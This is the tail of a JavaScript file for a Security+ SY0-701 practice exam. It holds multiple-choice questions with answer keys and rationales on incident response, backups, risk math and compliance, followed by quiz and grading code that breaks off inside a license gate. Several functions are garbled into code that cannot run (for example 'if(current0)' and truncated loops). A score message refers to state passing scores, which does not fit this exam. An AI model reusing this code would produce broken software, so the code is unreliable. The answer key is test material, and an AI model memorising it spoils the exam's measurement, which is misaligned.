rationale:"Individual source systems see only their own events. A SIEM centralizes and correlates across sources, making it possible to detect patterns no single system can see: a login from one country followed by a Windows event log entry on a server in another, a phishing email followed by a malware execution followed by lateral movement. (A) is incorrect, (C) and (D) are usually worse with a SIEM than without."
},
{
cat:"D4",
q:"A SOAR platform receives a SIEM alert about a confirmed-malicious file hash. The SOAR automatically queries the EDR to find every host where that hash has been seen, isolates those hosts from the network, and creates a ticket for the analyst. What is the PRIMARY value of SOAR in this workflow?",
options:["Replacing the analyst entirely","Reducing mean time to respond (MTTR) by automating the deterministic parts of incident response, freeing the analyst for judgment work","Increasing the number of false positives","Eliminating the need for a SIEM"],
correct:1,
rationale:"Security Orchestration, Automation, and Response (SOAR) automates repetitive, deterministic steps in an IR playbook — query, contain, ticket — so the analyst spends their time on judgment-heavy work (root cause, scope, communication). It reduces MTTR dramatically. It does not replace analysts (judgment is still human), does not increase false positives, and works alongside (not instead of) the SIEM."
},
{
cat:"D4",
q:"An organization follows the 3-2-1 backup rule. Which of the following BEST describes it?",
options:["3 backups, 2 hours, 1 copy","3 copies of data, on 2 different media types, with 1 copy off-site","3 vendors, 2 protocols, 1 cloud","3 admins, 2 reviews, 1 approval"],
correct:1,
rationale:"The 3-2-1 backup rule: maintain 3 total copies of important data, on 2 different media types (e.g., local disk and tape, or local disk and cloud), with 1 copy stored off-site. The rule survives common failure modes — a hardware failure does not destroy multiple copies, a fire does not destroy the off-site copy, and ransomware that hits primary storage does not necessarily hit air-gapped or off-site copies."
},
{
cat:"D4",
q:"An organization's Recovery Point Objective (RPO) for its order-management database is 1 hour. What does this mean?",
options:["The system must be restored within 1 hour of an outage","The maximum acceptable data loss is 1 hour of transactions — backups must be taken at least every hour","Backups are kept for 1 hour","Users are notified within 1 hour"],
correct:1,
rationale:"RPO defines the maximum acceptable amount of data loss measured in time. A 1-hour RPO means backups (or replication) must be frequent enough that no more than 1 hour of data can be lost in any disaster. Recovery Time Objective (RTO) is the maximum acceptable downtime — that is what (A) describes. Knowing the difference between RPO and RTO is heavily tested."
},
{
cat:"D4",
q:"Which disaster-recovery site type provides the FASTEST recovery time but at the HIGHEST cost?",
options:["Cold site","Warm site","Hot site","Mobile site"],
correct:2,
rationale:"A hot site is a fully equipped, near-real-time replica of production — failover can occur in minutes. It is also the most expensive because the duplicate infrastructure is always running. A cold site is space and power only; recovery takes days. A warm site has hardware but data must be loaded; recovery takes hours. Mobile sites are portable but typically warm-class. Cost and recovery speed scale together."
},
{
cat:"D4",
q:"Which incident response phase includes activities like training staff, building playbooks, deploying monitoring, and maintaining contact lists for legal and PR?",
options:["Identification","Preparation","Containment","Recovery"],
correct:1,
rationale:"Preparation is the everything-before-the-incident phase: train people, write and test playbooks, deploy monitoring, maintain contacts for legal/PR/law enforcement, ensure communications channels work. Identification is detecting an incident in progress. Containment limits damage. Recovery restores normal operations. Most IR maturity gaps are in Preparation, not in the heat-of-incident phases."
},
{
cat:"D4",
q:"An organization runs a quarterly exercise where the IR team walks through a hypothetical breach scenario at a conference table, discussing what each role would do. What kind of exercise is this?",
options:["Live red-team engagement","Tabletop exercise","Full-scale failover test","Penetration test"],
correct:1,
rationale:"A tabletop exercise is a discussion-based walkthrough of an incident scenario with no real systems impacted. It is the cheapest way to validate playbooks, surface confusion about roles, and find missing decision points. Live red-team engagements actually attack the environment. Full-scale failover tests actually fail systems over. Pen tests look for exploitable vulnerabilities. Tabletops are the foundation; the other exercises are the building."
},
{
cat:"D4",
q:"A forensic responder must image a suspect's hard drive for analysis. What hardware should be used to prevent any accidental modification of the source drive during imaging?",
options:["A network tap","A write blocker (hardware or software)","A KVM switch","A USB hub"],
correct:1,
rationale:"A write blocker is a device (hardware or software) placed between the forensic workstation and the source drive that physically/logically prevents any write commands from reaching the source. It preserves the integrity of evidence and the chain of custody — modification of the source after seizure can render evidence inadmissible. A network tap copies network traffic. A KVM switch shares peripherals. A USB hub just multiplies ports — does NOT block writes."
},
{
cat:"D4",
q:"After imaging a suspect drive, the forensic responder generates a SHA-256 hash of the image and the source. Why is this critical to the investigation?",
options:["To compress the image","To prove in court that the image was not altered after acquisition (chain of custody)","To make the analysis faster","To encrypt the image"],
correct:1,
rationale:"The hash of the source drive at acquisition time is recorded; later, the analyst (or opposing counsel) can rehash the image and verify it matches the original. If the hashes match, the integrity of the evidence is mathematically provable. This is a foundational element of chain of custody in digital forensics — without it, evidence can be challenged as potentially tampered with. Hashing does not compress or encrypt the image."
},
{
cat:"D4",
q:"PERFORMANCE-BASED: Place the following NIST incident response phases in correct order: (1) Containment, Eradication, Recovery; (2) Lessons Learned; (3) Detection and Analysis; (4) Preparation. What is the correct sequence?",
options:["4, 3, 1, 2","1, 2, 3, 4","3, 4, 1, 2","4, 1, 3, 2"],
correct:0,
rationale:"NIST SP 800-61 defines the IR lifecycle as: Preparation (4) — build capability before an incident; Detection and Analysis (3) — recognize and scope an incident; Containment, Eradication, and Recovery (1) — limit, remove, restore; Lessons Learned (2) — improve based on what happened. The correct order is 4-3-1-2. Many organizations skip Preparation and Lessons Learned, which is exactly why most incidents have recurring root causes."
},
{
cat:"D4",
q:"A web filtering proxy blocks access to known malicious domains and categories of inappropriate content. What category of control is this PRIMARILY?",
options:["Detective","Preventive","Corrective","Compensating"],
correct:1,
rationale:"A web filtering proxy stops users from reaching dangerous destinations BEFORE the harmful content can load — preventive. Detective controls would log and alert AFTER the fact (a SIEM detecting C2 traffic). Corrective controls clean up after an incident (restore from backup). Compensating controls substitute for an absent primary control. Many security tools are multi-class; the question asks for the PRIMARY function."
},
{
cat:"D4",
q:"An organization deploys EDR agents on every endpoint. The EDR continuously monitors process activity, file modifications, registry changes, and network connections, and uses behavioral analytics to detect suspicious patterns. How does EDR PRIMARILY differ from traditional antivirus?",
options:["EDR only scans on a schedule; AV is real-time","EDR focuses on behavioral and post-execution detection plus response actions; traditional AV focuses on signature matching","EDR is cheaper","EDR cannot quarantine files"],
correct:1,
rationale:"Traditional antivirus relies primarily on signature matching against known malware files. EDR adds continuous monitoring of behavior (process trees, lateral movement attempts, suspicious script execution), detects threats AV would miss, and provides response capabilities (isolate, kill process, roll back changes). The shift from signature-only to behavior-aware is the defining difference. Many modern EDR products still include AV signatures plus the behavioral layer."
},
{
cat:"D4",
q:"An organization wants to detect unauthorized data exfiltration by monitoring outbound network traffic for sensitive data patterns (credit card numbers, SSNs, classified document markers). What category of tool is this?",
options:["DLP (Data Loss Prevention)","IDS (Intrusion Detection System)","WAF (Web Application Firewall)","SIEM"],
correct:0,
rationale:"DLP monitors data in motion (network egress), at rest (file shares, endpoints), and in use (clipboard, USB, print). It detects and blocks transmission of sensitive data patterns. IDS detects attacks on the network. WAF protects web apps from app-layer attacks. SIEM aggregates and correlates logs. The scenario specifically describes pattern-matching outbound traffic for sensitive data — the canonical DLP use case."
},
{
cat:"D4",
q:"An organization has a strict offboarding process: when an employee leaves, IT must disable all of their accounts within 24 hours. Why is this timing critical?",
options:["To save license fees","Former employees with active credentials are a major insider-threat vector, especially in the first days after a contentious departure","Audit requirements only","To reuse their email address"],
correct:1,
rationale:"Former employees retain knowledge of systems and processes; if their access is not promptly revoked, they (or someone who acquires their credentials) can take revenge, exfiltrate data, or commit fraud — a documented pattern in many high-profile insider incidents. Tight, time-bound, federated offboarding is the mitigation. License fees and audit are secondary motivations. Reusing email addresses is operationally awkward and not the primary security driver."
},
{
cat:"D4",
q:"Which port and protocol does HTTPS use by default?",
options:["TCP 80","TCP 443","UDP 53","TCP 22"],
correct:1,
rationale:"HTTPS uses TCP port 443 (TLS-encrypted HTTP). TCP 80 is HTTP (cleartext). UDP 53 is DNS. TCP 22 is SSH. CompTIA expects rote recall of standard ports for the exam: FTP 20/21, SSH 22, Telnet 23, SMTP 25, DNS 53, HTTP 80, POP3 110, IMAP 143, HTTPS 443, SMB 445, RDP 3389. Memorize them."
},
{
cat:"D4",
q:"A vulnerability scan is performed without authentication — only what an unauthenticated attacker on the network could see. What is this called, and what is its primary limitation?",
options:["Credentialed scan — slower","Non-credentialed scan — misses vulnerabilities in services that require authentication to enumerate and patches that require local registry/file inspection","Passive scan — too noisy","Compliance scan — too narrow"],
correct:1,
rationale:"A non-credentialed (unauthenticated) scan reflects what an external attacker without credentials would see, which has external defensive value. Its limitation: many vulnerabilities are only visible when logged in (missing patches, weak local configs, vulnerable installed software). A credentialed scan gives a richer, more accurate picture. Most mature programs run both — non-credentialed for external posture, credentialed for true vulnerability inventory."
},
{
cat:"D4",
q:"A red team uses Cobalt Strike to establish a foothold, dump LSASS memory to extract credentials, then uses pass-the-hash to authenticate to other servers without knowing the plaintext passwords. Which Microsoft mitigation is MOST EFFECTIVE against this attack chain?",
options:["Stronger passwords for all users","Credential Guard (virtualization-based protection of LSASS) plus disabling NTLM where possible","Antivirus","Daily backups"],
correct:1,
rationale:"Pass-the-hash works because Windows uses cached credential material (LM/NTLM hashes) for authentication; an attacker with admin on one box can extract hashes and replay them. Credential Guard uses virtualization-based security to isolate LSASS so even admins cannot extract the hashes. Disabling NTLM in favor of Kerberos removes much of the pass-the-hash attack surface. Stronger passwords do not help when the hash itself is what is being replayed. AV may catch Cobalt Strike but not the underlying technique. Backups are recovery, not prevention."
},
{
cat:"D4",
q:"PERFORMANCE-BASED: A SOC analyst sees the following sequence in 30 minutes: (a) successful logon from a contractor account, (b) creation of a new local admin account on the contractor's workstation, (c) lateral movement attempt to a domain controller, (d) extraction of NTDS.dit. What is the MOST appropriate containment action ordering?",
options:["(1) Isolate workstation network; (2) Disable contractor account; (3) Force password reset for any high-value accounts that may have been exposed; (4) Begin forensic collection","(1) Restore from backup; (2) Send an email to all employees","(1) Wait and monitor; (2) See if the activity stops","(1) Patch the operating system; (2) Reboot the domain controller"],
correct:0,
rationale:"Containment goal: stop the active attack while preserving evidence. (1) Network isolation cuts the attacker off the workstation without powering it down (preserves RAM). (2) Disable the contractor account so the attacker cannot reuse it elsewhere. (3) NTDS.dit extraction exposes domain hashes — force password reset for affected high-value accounts immediately. (4) Then begin formal forensic collection. The other options either fail to contain (B, C) or address the wrong layer entirely (D)."
},
{
cat:"D4",
q:"A company wants to centralize all security policy configuration (password requirements, MFA enforcement, conditional access, account lockout, audit logging) across hundreds of Active Directory clients. What technology accomplishes this?",
options:["Local Security Policy on each machine","Group Policy Objects (GPOs) applied at the OU level","Manual hardening scripts run weekly","Per-user registry edits"],
correct:1,
rationale:"Group Policy Objects (GPOs) centrally configure Windows clients and servers in an Active Directory domain. Policies are linked at the Site/Domain/OU level and inherited down the AD tree, allowing fine-grained targeting. Local policy applies to a single machine. Manual scripts don't scale and drift. Per-user registry edits are unmanageable. GPO mastery is foundational for any Windows enterprise security role."
},
{
cat:"D5",
q:"A company identifies a low-likelihood, low-impact risk that would cost more to mitigate than the potential loss. Which risk treatment is MOST appropriate?",
options:["Mitigate","Transfer","Accept","Avoid"],
correct:2,
rationale:"When the cost of mitigation exceeds expected loss, formal risk acceptance is appropriate — documented, approved, and reviewed periodically. Mitigation would be wasteful. Transfer (typically via insurance) also has cost and is unlikely to be cost-effective for a low-impact risk. Avoidance means eliminating the activity that creates the risk, which is extreme for a low-impact item."
},
{
cat:"D5",
q:"A US-based company processes credit card payments for customers and stores customer health data for a wellness program. Which TWO compliance frameworks MUST it satisfy?",
options:["SOX and FERPA","PCI DSS and HIPAA","GDPR and FISMA","GLBA and COPPA"],
correct:1,
rationale:"Processing credit card data triggers PCI DSS. Storing customer health data triggers HIPAA if the company qualifies as a covered entity or business associate. SOX is for publicly traded company financial reporting; FERPA is for educational records. GDPR applies to EU residents' data. FISMA is for federal agencies. GLBA is for financial institutions; COPPA is for children's online data — neither matches."
},
{
cat:"D5",
q:"A company has invested heavily in technical controls but its breach rate has not improved. What additional control is MOST likely to reduce successful phishing attacks?",
options:["Stronger firewall rules","Regular security awareness training combined with phishing simulations","Faster patch deployment","Increased SOC staffing"],
correct:1,
rationale:"Successful phishing attacks bypass technical controls by tricking the human user. The control that addresses the HUMAN attack surface is awareness training reinforced by realistic phishing simulations that teach recognition. Stronger firewall rules and faster patches do not address user behavior. More SOC staff helps detection AFTER an attack succeeds; the question asks about reducing the success rate."
},
{
cat:"D5",
q:"An organization calculates an Annual Loss Expectancy (ALE) of $40,000 for a particular risk. The Single Loss Expectancy (SLE) is $20,000. What is the Annualized Rate of Occurrence (ARO)?",
options:["0.5","1.0","2.0","4.0"],
correct:2,
rationale:"ALE = SLE × ARO, so ARO = ALE ÷ SLE = $40,000 ÷ $20,000 = 2.0 (the loss is expected to occur twice per year on average). Quantitative risk math is heavily tested on SY0-701. Memorize: SLE = Asset Value × Exposure Factor, ALE = SLE × ARO. Understanding the formula lets you back-solve any of the four values."
},
{
cat:"D5",
q:"Which document defines the minimum acceptable performance levels that a service provider commits to deliver to a customer (e.g., 99.9% uptime)?",
options:["NDA","MOU","SLA","BPA"],
correct:2,
rationale:"A Service Level Agreement (SLA) defines specific, measurable performance commitments and the remedies (often credits) if they are missed. An NDA (Non-Disclosure Agreement) protects confidential information. An MOU (Memorandum of Understanding) is a non-binding expression of intent between parties. A BPA (Business Partnership Agreement) outlines roles and responsibilities in a partnership. SLAs are operationally binding and central to vendor risk management."
},
{
cat:"D5",
q:"An organization is choosing between quantitative and qualitative risk analysis for a particular assessment. Which statement BEST captures the trade-off?",
options:["Quantitative is faster and easier; qualitative is more accurate","Quantitative uses numeric values (SLE, ARO, ALE) and is rigorous but data-intensive; qualitative uses ranked categories (high/medium/low) and is faster but less precise","They produce identical results","Qualitative is only used for compliance"],
correct:1,
rationale:"Quantitative risk analysis assigns dollar values and probabilities, producing precise expected-loss figures — useful when data is available and decisions need defensible numbers. Qualitative analysis uses ranked categories, much faster to perform, used when data is sparse or for early triage. Mature programs use both: qualitative to triage, quantitative on the top risks. (A) inverts the trade-off. (C) and (D) are wrong."
},
{
cat:"D5",
q:"A company is onboarding a new third-party vendor that will process customer PII. What is the MOST important security activity to complete BEFORE granting access?",
options:["Pay the vendor","Vendor risk assessment (security questionnaire, SOC 2 review, contractual data-protection terms including breach-notification SLAs)","Schedule a kickoff meeting","Add the vendor's logo to the website"],
correct:1,
rationale:"Third-party risk management requires that vendors handling sensitive data be assessed BEFORE access is granted: security questionnaire (SIG, CAIQ), independent attestation (SOC 2, ISO 27001), contractual terms (DPA, breach-notification SLA, right-to-audit). Many of the largest breaches in the last decade have come through inadequately vetted third parties. (A), (C), (D) are operational steps, not security ones."
},
{
cat:"D5",
q:"An organization classifies data into four levels: Public, Internal, Confidential, Restricted. What is the PRIMARY purpose of data classification?",
options:["To make data look organized","To match the level of protection (encryption, access control, handling) to the sensitivity of the data","To improve database performance","To comply with one specific regulation"],
correct:1,
rationale:"Data classification labels data by sensitivity so the organization can apply proportionate controls — Restricted data requires encryption at rest and in transit plus strict access control; Public data needs only basic integrity protection. Without classification, organizations either over-protect everything (expensive) or under-protect what matters most. Classification underpins DLP, access reviews, retention policy, and most compliance frameworks."
},
{
cat:"D5",
q:"Which document defines what employees may and may not do with the company's IT resources (email, internet, devices)?",
options:["Acceptable Use Policy (AUP)","Privacy Policy","Service Level Agreement","Business Continuity Plan"],
correct:0,
rationale:"An Acceptable Use Policy (AUP) sets the rules of conduct for employees using company IT resources — what is allowed, what is prohibited, consequences of violation. It is foundational for both security and HR enforcement. A Privacy Policy describes how the company handles personal data. An SLA defines service performance commitments. A BCP describes how the business continues operating during disruption."
},
{
cat:"D5",
q:"A regulation requires that EU residents be able to request a copy of all personal data a company holds about them, request correction of inaccurate data, and request deletion under defined conditions. Which regulation is this?",
options:["HIPAA","PCI DSS","GDPR","SOX"],
correct:2,
rationale:"The General Data Protection Regulation (GDPR) grants EU residents rights of access, rectification, erasure ('right to be forgotten'), portability, restriction, and objection — applicable to any organization globally that processes EU residents' personal data. HIPAA covers US health data. PCI DSS covers payment card data. SOX covers US public-company financial reporting. GDPR is the most expansive data-subject-rights regime currently in force globally."
},
{
cat:"D5",
q:"An organization requires that any employee accessing financial systems must take at least two consecutive weeks of vacation each year, during which someone else covers their duties. What control is this, and what fraud is it designed to detect?",
options:["Mandatory vacation — designed to surface ongoing fraud that requires the perpetrator's continuous presence to conceal","Time-off policy — designed to reduce burnout","Performance review — designed to evaluate productivity","Background check — designed to verify identity"],
correct:0,
rationale:"Mandatory vacation is a long-standing financial-industry control: many fraud schemes (Ponzi-style cover-ups, fraudulent loan portfolios, kiting) require the perpetrator's daily presence to hide ongoing manipulation. Forced absence with someone else doing the job often surfaces the discrepancies. It is a detective control, distinct from burnout-reduction policies. Background checks happen at hire; performance reviews evaluate output. The fraud-detection function is the SY0-701 testable point."
},
{
cat:"D5",
q:"An organization implements job rotation: employees in sensitive positions change roles every 2 years. What is the PRIMARY security purpose?",
options:["To make employees better at all jobs","To detect long-running fraud by exposing it to a fresh set of eyes and to reduce single points of knowledge","To save salary costs","To improve morale"],
correct:1,
rationale:"Job rotation is both a detective control (a successor reviewing the predecessor's work often discovers fraud or shortcuts) and a resilience control (no single individual is irreplaceable). It is paired with mandatory vacation and separation of duties as the classic insider-threat triad. Skill cross-training and morale are real secondary benefits but not the security purpose for the SY0-701 exam."
},
{
cat:"D5",
q:"A US federal government agency is required to implement a security program based on NIST SP 800-53 controls and a continuous monitoring program. Which framework or regulation imposes this?",
options:["HIPAA","FISMA / NIST RMF","PCI DSS","Sarbanes-Oxley"],
correct:1,
rationale:"FISMA (Federal Information Security Modernization Act) requires federal agencies and their contractors to implement a security program aligned with the NIST Risk Management Framework (RMF) and NIST SP 800-53 control catalog. HIPAA covers health data. PCI DSS covers payment cards. SOX covers public-company financial reporting. Knowing which regulation drives which framework is testable: SOX → COSO/COBIT, HIPAA → HIPAA Security Rule, FISMA → NIST RMF, PCI → PCI DSS itself."
},
{
cat:"D5",
q:"An organization's risk appetite is defined as low — leadership wants to avoid all but the smallest possible risks. A new business initiative would have high revenue potential but introduces a medium-likelihood, high-impact data-breach risk. What is the MOST appropriate response?",
options:["Proceed without modification — revenue is more important","Decline the initiative or modify its scope until residual risk fits within the stated appetite","Ignore the risk register","Re-classify the risk as low"],
correct:1,
rationale:"Risk appetite is the qualitative statement of how much risk leadership is willing to accept in pursuit of objectives. When an initiative's residual risk exceeds the stated appetite, the correct response is to bring the risk within appetite (additional controls, scope reduction, transfer via insurance) or to decline. Proceeding anyway undermines the governance framework. Re-classifying a real risk as something it is not is the worst possible response — it is risk management theater."
},
{
cat:"D5",
q:"An organization decides to retain cyber insurance to cover potential breach costs (notification, credit monitoring, forensics, legal). Which risk treatment does this represent, and what are its LIMITATIONS?",
options:["Acceptance — insurance does not change risk","Transfer — but insurance does not eliminate the underlying risk, may exclude state-sponsored attacks, and has policy limits; reputation damage is rarely fully insurable","Avoidance — insurance prevents the risk","Mitigation — insurance reduces likelihood"],
correct:1,
rationale:"Insurance transfers (some of) the financial impact of a risk to the insurer. Limitations are significant: most cyber policies exclude state-sponsored attacks (look up the merck/zurich case for context), have policy caps below realistic large-breach costs, may decline coverage if pre-conditions (MFA, EDR, IR plan) were not in place, and rarely compensate for reputation damage or lost business. Insurance does not reduce the underlying probability of a breach — it changes who pays after one."
},
{
cat:"D5",
q:"An organization is preparing for an external audit. What is the PRIMARY difference between an audit and an assessment?",
options:["Audits are conducted internally; assessments externally","An assessment evaluates posture often for the org's own improvement; an audit is typically formal, evidence-driven, conducted against a specific standard, and produces an opinion or attestation","They are the same thing","Audits are voluntary; assessments are mandatory"],
correct:1,
rationale:"An assessment is broader and often diagnostic — it identifies strengths, weaknesses, and recommendations. An audit is more formal, follows a specific standard (SOC 2, ISO 27001, PCI DSS, FedRAMP), requires evidence for every control assertion, and ends with a formal opinion, certification, or attestation that can be shared with customers and regulators. Both can be internal or external. (A) and (D) are not the defining differences."
},
{
cat:"D5",
q:"An organization runs simulated phishing campaigns and tracks who clicks. Repeat clickers receive targeted training. What is this an example of?",
options:["Reactive security only","Continuous security awareness reinforced by behavioral measurement","A penetration test","Compliance audit"],
correct:1,
rationale:"Mature security awareness programs measure behavior (not just attendance at training) by running periodic simulated phishing, tracking who clicks or reports, and routing repeat clickers to targeted reinforcement. This is far more effective than annual computer-based training that everyone clicks through. It is also evidence of an ongoing program — a key audit point under most frameworks."
},
{
cat:"D5",
q:"Which framework is BEST described as a comprehensive set of management, operational, and technical control categories that organizations select from based on a system's impact level (Low, Moderate, High)?",
options:["NIST SP 800-53","PCI DSS","GDPR","HIPAA Security Rule"],
correct:0,
rationale:"NIST SP 800-53 is a catalog of ~1000 security and privacy controls organized into families (Access Control, Audit, Configuration Management, etc.). Federal agencies and many private-sector organizations baseline controls based on FIPS 199 impact level — Low, Moderate, or High — and tailor from there. PCI DSS is the payment card framework. GDPR is the EU data-protection regulation. HIPAA Security Rule is the US health-data framework. 800-53 is the broadest catalog."
},
{
cat:"D5",
q:"A SaaS vendor publishes a SOC 2 Type II report. What does the 'Type II' designation specifically tell a prospective customer?",
options:["Only that the controls were designed adequately at a point in time","That the controls were both designed adequately AND operated effectively over a defined period (typically 6-12 months)","That the vendor is certified by the IRS","That the report is automatically renewed every year"],
correct:1,
rationale:"SOC 2 Type I assesses control DESIGN at a single point in time. SOC 2 Type II assesses both design AND operating effectiveness over a period (commonly 6 or 12 months) — meaning auditors sampled evidence throughout the period to verify controls actually ran as designed. Type II reports are dramatically more valuable for vendor risk assessment because they reflect sustained operation, not a one-time snapshot."
},
{
cat:"D5",
q:"A US-based healthcare provider uses a third-party SaaS vendor to host patient records. Which contractual instrument MUST be in place between the provider and the vendor under HIPAA?",
options:["Service Level Agreement (SLA) only","Business Associate Agreement (BAA)","Non-Disclosure Agreement (NDA) only","Memorandum of Understanding (MOU)"],
correct:1,
rationale:"HIPAA requires that any vendor (Business Associate) that creates, receives, maintains, or transmits PHI on behalf of a Covered Entity sign a Business Associate Agreement (BAA). The BAA contractually extends HIPAA obligations to the vendor, defines breach-notification timing, and limits permitted uses of PHI. An SLA, NDA, or MOU alone does NOT satisfy HIPAA. Operating with PHI without a BAA in place is a per-record violation with potentially massive penalties."
},
{
cat:"D5",
q:"An organization conducts a Business Impact Analysis (BIA). What is the PRIMARY output and how is it used?",
options:["A patch list — used for vulnerability management","A prioritized inventory of business processes with their RTO, RPO, and dependencies — used to design the BCP/DR plan and resource allocation","A budget — used for purchasing","A risk register — used for compliance reporting"],
correct:1,
rationale:"A BIA identifies the critical business processes, the impact of their disruption over time (financial, operational, reputational), the maximum tolerable downtime (RTO) and acceptable data loss (RPO), and the dependencies (people, systems, vendors, facilities). This drives BCP/DR design — what to recover first, how fast, and what backup capacity is needed. Without a current BIA, recovery investment is essentially guesswork."
},
{
cat:"D5",
q:"An organization's privacy program implements 'privacy by design' as a core principle. What does this BEST mean in practice?",
options:["Privacy is considered only after a system is built","Privacy considerations (data minimization, default-private settings, transparency, purpose limitation) are built into the system from the earliest design stage and throughout the lifecycle","Privacy means using strong encryption only","Privacy is the marketing team's responsibility"],
correct:1,
rationale:"Privacy by design (Ann Cavoukian's 7 foundational principles, also embedded in GDPR Article 25) means treating privacy as a default architectural property — minimizing data collected, defaulting to the most private settings, building in user transparency, limiting data use to declared purposes, and integrating privacy across the full lifecycle. It is the opposite of bolting privacy on after the system is built. Encryption is one tool; the principle is broader."
},
{
cat:"D5",
q:"Which framework provides 18 prioritized, actionable Critical Security Controls that are often used by small and mid-size organizations as a starting baseline?",
options:["NIST SP 800-53","CIS Controls (formerly SANS Top 20)","ISO 31000","COBIT 2019"],
correct:1,
rationale:"The CIS Controls (currently version 8 with 18 controls, formerly the SANS Top 20) are a prioritized, action-oriented set of practices specifically designed to be implementable by smaller organizations as a starting baseline. NIST SP 800-53 is exhaustive but heavy. ISO 31000 is risk-management focused. COBIT is governance-focused. For an SMB without dedicated security staff, starting with CIS Controls Implementation Group 1 is the most common pragmatic approach."
}
];
// ===== CATEGORY METADATA =====
const CATS = {
D1:{name:"General Security Concepts", short:"General"},
D2:{name:"Threats, Vulnerabilities & Mitigations", short:"Threats"},
D3:{name:"Security Architecture", short:"Architecture"},
D4:{name:"Security Operations", short:"Operations"},
D5:{name:"Security Program Management & Oversight", short:"Program Mgmt"}
};
const CAT_ORDER = ["D1","D2","D3","D4","D5"];
// ===== STATE =====
let answers = {}; // {questionIndex: selectedOptionIndex}
let current = 0;
let timerEnabled = true;
let timeLeft = 150*60; // seconds
let timerInterval = null;
const TOTAL = QUESTIONS.length;
// ===== START SCREEN =====
document.getElementById('fact-count').textContent = TOTAL;
document.getElementById('qtotal').textContent = TOTAL;
document.getElementById('timerToggle').addEventListener('click', function(){
this.classList.toggle('on');
timerEnabled = this.classList.contains('on');
});
function show(id){
document.querySelectorAll('.screen').forEach(s=>s.classList.remove('active'));
document.getElementById(id).classList.add('active');
window.scrollTo(0,0);
}
function startTest(){
answers={}; current=0;
show('screen-quiz');
buildJumpGrid();
renderQuestion();
if(timerEnabled){
document.getElementById('timer').classList.remove('hidden');
timeLeft=150*60;
updateTimerDisplay();
timerInterval=setInterval(tick,1000);
} else {
document.getElementById('timer').classList.add('hidden');
}
}
function tick(){
timeLeft--;
updateTimerDisplay();
if(timeLeft<=0){
clearInterval(timerInterval);
document.getElementById('timer').textContent="Time's up — finish & submit";
}
}
function updateTimerDisplay(){
const m=Math.floor(timeLeft/60), s=timeLeft%60;
const t=document.getElementById('timer');
t.textContent=`${m}:${s.toString().padStart(2,'0')}`;
if(timeLeft<=300) t.classList.add('warn');
}
// ===== RENDER QUESTION =====
function renderQuestion(){
const q=QUESTIONS[current];
document.getElementById('qnum').textContent=current+1;
document.getElementById('qcat').textContent=CATS[q.cat].short;
document.getElementById('qtext').textContent=q.q;
document.getElementById('progbar').style.width=((current+1)/TOTAL*100)+'%';
const letters=['A','B','C','D','E','F'];
let html='';
q.options.forEach((opt,i)=>{
const sel = answers[current]===i ? 'selected':'';
html+=`
${letters[i]}
${opt}
`;
});
document.getElementById('choices').innerHTML=html;
document.getElementById('prevBtn').disabled = current===0;
document.getElementById('nextBtn').disabled = current===TOTAL-1;
updateJumpGrid();
}
function selectChoice(i){
answers[current]=i;
renderQuestion();
}
function nextQ(){ if(current0){current--;renderQuestion();} }
// ===== JUMP GRID =====
function buildJumpGrid(){
let html='';
for(let i=0;i${i+1}`;
}
document.getElementById('jumpgrid').innerHTML=html;
}
function updateJumpGrid(){
for(let i=0;i0){
msg=`You have ${unanswered} unanswered question${unanswered>1?'s':''}. `+
`On the real exam, unanswered questions count as wrong — there's no penalty for guessing, so it's always better to answer. `+
`\n\nSubmit anyway?`;
} else {
msg="Ready to submit and see your diagnostic results?";
}
if(confirm(msg)){ gradeTest(); }
}
// ===== GRADING & DIAGNOSTICS =====
function gradeTest(){
if(timerInterval) clearInterval(timerInterval);
// tally by category
const tally={}; CAT_ORDER.forEach(c=>tally[c]={correct:0,total:0});
let totalCorrect=0;
QUESTIONS.forEach((q,i)=>{
tally[q.cat].total++;
if(answers[i]===q.correct){ tally[q.cat].correct++; totalCorrect++; }
});
const pctOverall = totalCorrect/TOTAL;
// Scaled-style score: map 0-100% onto a 100-200 scale (mirrors -style range).
// This is an APPROXIMATION for study feedback, clearly labeled as such.
const scaled = Math.round(100 + pctOverall*100);
const PASS = 150;
const passed = scaled >= PASS;
// hero
const hero=document.getElementById('resultHero');
hero.className='result-hero '+(passed?'pass':'nopass');
// Calibrated messaging tiers
let verdict, msg;
if(scaled>=180){
verdict='Excellent — Well Above Target';
msg=`You scored well above the ~${PASS} passing target on this practice exam. You're in strong shape — use the review below to lock in any remaining gaps.`;
} else if(scaled>=165){
verdict='On Track to Pass';
msg=`You scored comfortably above the ~${PASS} target on this practice exam. Solid work — keep sharpening your weaker categories below.`;
} else if(scaled>=PASS){
verdict='Just Over the Line';
msg=`You're just at or above the ~${PASS} target — passing, but with little margin. Focus on your weaker categories below to build a safer cushion before test day.`;
} else if(scaled>=140){
verdict='Almost There';
msg=`You're just below the ~${PASS} target. You're close — the category breakdown below shows exactly which areas will get you over the line.`;
} else {
verdict='Keep Studying';
msg=`You're below the ~${PASS} target on this practice exam. Don't be discouraged — the diagnostic below pinpoints exactly where to focus your study time for the biggest gains.`;
}
document.getElementById('verdict').textContent = verdict;
document.getElementById('scoreNum').textContent = scaled;
document.getElementById('passMsg').textContent = msg;
document.getElementById('rawSub').textContent =
`You answered ${totalCorrect} of ${TOTAL} correct (${Math.round(pctOverall*100)}%). `+
`Most states set the exam passing score around 150 — confirm your state's exact requirement.`;
// category bars
let catHtml='';
CAT_ORDER.forEach(c=>{
const t=tally[c];
const pct = t.total? t.correct/t.total : 0;
const pctR=Math.round(pct*100);
let status,sClass,fClass;
if(pct>=0.8){status='Ready';sClass='s-ready';fClass='fill-ready';}
else if(pct>=0.6){status='Close — review recommended';sClass='s-close';fClass='fill-close';}
else{status='Needs major work';sClass='s-work';fClass='fill-work';}
catHtml+=`
`;
});
document.getElementById('reviewArea').innerHTML=html;
}
function toggleReview(){
const area=document.getElementById('reviewArea');
const btn=document.getElementById('reviewBtn');
if(area.style.display==='none'){
area.style.display='block';
btn.textContent='Hide Answer Review';
area.scrollIntoView({behavior:'smooth'});
} else {
area.style.display='none';
btn.textContent='Review All Answers & Rationales';
}
}
function restart(){
answers={};current=0;timeLeft=150*60;
document.getElementById('timer').classList.remove('warn');
document.getElementById('reviewArea').style.display='none';
document.getElementById('reviewBtn').textContent='Review All Answers & Rationales';
show('screen-start');
}
// =================================================================
// GATE — passcode + name confirmation + Tier 1/2 protections
// =================================================================
const THIS_PRODUCT = 'exam';
const MAX_ACTIVATIONS = 2;
const FULFILLMENT_WORKER_URL = 'https://cipherpathway-fulfillment.drbishopclark20.workers.dev';
const FALLBACK_CODES = [
